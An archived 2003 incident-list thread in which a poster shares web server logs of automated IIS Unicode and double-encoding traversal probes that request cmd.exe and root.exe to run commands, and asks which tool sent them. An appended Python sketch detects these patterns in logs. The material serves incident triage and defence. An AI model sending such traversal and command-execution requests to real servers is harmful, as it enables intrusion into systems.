RE: Anyone know this tool?
From: James Williams (jwilliams_at_mail.wtamu.edu)
Date: 07/29/03
- Previous message: Jason Rumney: "Re: Anyone know this tool?"
- In reply to: Danny: "Anyone know this tool?"
- Next in thread: Danny: "Re: Anyone know this tool?"
- Reply: Danny: "Re: Anyone know this tool?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: "'Danny'" <danny@eboundary.com>
Date: Tue, 29 Jul 2003 11:42:06 -0500
Looks like old Unicode exploits. Those scanners are all over the place.
You could probably go to packetstormsecurity.nl and search for "Unicode"
and find one.
James Williams
Network Systems Engineer
West Texas A&M University
http://www.wtamu.edu
Phone: 806-651-2162
Email: jwilliams@mail.wtamu.edu
-----Original Message-----
From: Danny [mailto:danny@eboundary.com]
Sent: Monday, July 28, 2003 10:24 PM
To: incidents@securityfocus.com
Subject: Anyone know this tool?
Does anyone happen to know what tool this is? I've seen the exact same
scans on 6 of our servers on completely different networks. All the
scans have been from different source IPs and all the servers were hit
within a space of a few hours.
Curiosity is getting the better of me since I've never seen this exact
pattern before :)
64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
Danny
Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
Play - http://www.eBoundary.net - Who really sets your electronic
boundaries?
AIM: eBoundaryTch | ICQ: 3090141
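
A log triage sketch for the probe pattern quoted above, added here as an example and not part of either message or of any tool named in the thread. It flags request paths that change when percent-decoded a second time (the %255c and %%35c forms), that decode to the 0xC0/0xC1 lead bytes used by the overlong encodings (%c0%af, %c1%9c), or that ask for cmd.exe or root.exe, then groups hits by source address. The function names, the threshold and the sample lines are assumptions made for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# Constructed sample lines (Apache combined format) modelled on the quoted log;
# 192.0.2.x are documentation addresses, not the scanner's.
SAMPLE = [
    '192.0.2.10 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '192.0.2.10 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '192.0.2.10 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"',
    '192.0.2.10 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"',
    '192.0.2.20 - - [28/Jul/2003:22:19:01 -0500] "GET /index.html HTTP/1.0" 200 512 "-" "-"',
]

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
OVERLONG = re.compile(rb'[\xc0\xc1]')            # bytes that never occur in valid UTF-8
SHELL = re.compile(rb'(?:cmd|root)\.exe', re.I)  # binaries the probes ask for

def classify(path):
    """Return the set of reasons a request path looks like one of these probes."""
    reasons = set()
    once = unquote_to_bytes(path)    # what a server sees after one decode
    twice = unquote_to_bytes(once)   # what a second, erroneous decode would yield
    if twice != once:
        reasons.add('double-encoded')
    if OVERLONG.search(once):
        reasons.add('overlong-utf8')
    if SHELL.search(twice):
        reasons.add('shell-binary')
    return reasons

def scan(lines, threshold=3):
    """Return {ip: counts} for sources with at least `threshold` flagged requests."""
    hits = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, path, status = m.groups()
        reasons = classify(path)
        if reasons:
            c = hits.setdefault(ip, Counter())
            c.update(reasons | {'requests'})
            c['served_2xx'] += status.startswith('2')  # a 2xx here needs follow-up
    return {ip: dict(c) for ip, c in hits.items() if c['requests'] >= threshold}

if __name__ == '__main__':
    for ip, counts in scan(SAMPLE).items():
        print(ip, counts)
```

The log lines must be unwrapped, one request per line, before they are passed to scan().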